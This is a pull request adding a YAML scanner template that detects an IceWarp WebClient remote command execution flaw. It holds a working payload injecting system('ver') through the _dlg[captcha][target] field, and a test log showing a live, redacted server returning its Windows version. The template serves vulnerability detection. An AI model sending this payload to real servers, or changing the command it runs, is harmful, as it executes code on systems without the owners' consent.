### PR TITLE
Create icewarp-webclient-rce.yaml

### DIFF
--- a/vulnerabilities/other/icewarp-webclient-rce.yaml
+++ b/vulnerabilities/other/icewarp-webclient-rce.yaml
@@ -20,7 +20,7 @@ requests:
     matchers:
       - type: word
         words:
-          - "Microsoft Windows"
+          - "Microsoft Windows [Version"
         part: body
 
       - type: status

--- a/vulnerabilities/other/icewarp-webclient-rce.yaml
+++ b/vulnerabilities/other/icewarp-webclient-rce.yaml
@@ -1,0 +1,28 @@
+id: icewarp-webclient-rce
+
+info:
+  name: IceWarp WebClient RCE
+  author: gy741
+  severity: critical
+  tags: icewarp,rce
+  reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
+
+requests:
+  - raw:
+      - |
+        POST /webmail/basic/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        _dlg[captcha][target]=system(\'ver\')\
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Microsoft Windows"
+        part: body
+
+      - type: status
+        status:
+          - 302


### PR DESCRIPTION
Hello,

Added IceWarp WebClient RCE detection rule.

The PoC on the reference site does not work.

The ```ipconfig``` keyword seems to be filtered out.

The ```ver``` command passes normally.

test log:
```
POST /webmail/basic/ HTTP/1.1
Host: XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_dlg[captcha][target]=system(\'ver\')\
[INF] [icewarp-webclient-rce] Dumped HTTP response for http://XXX.XXX.XXX/webmail/basic/

HTTP/1.1 302 Moved Temporarily
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Fri, 09 Jul 2021 04:43:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: http://XXX.XXX.XXX/webmail/?_n[p][main]=win.login&eid=??&_s[action]=error&PHPSESSID_BASIC=??
Pragma: no-cache
Server: IceWarp/10.2.0
Set-Cookie: use_cookies=1
Vary: Accept-Encoding


Microsoft Windows [Version 5.2.3790]
```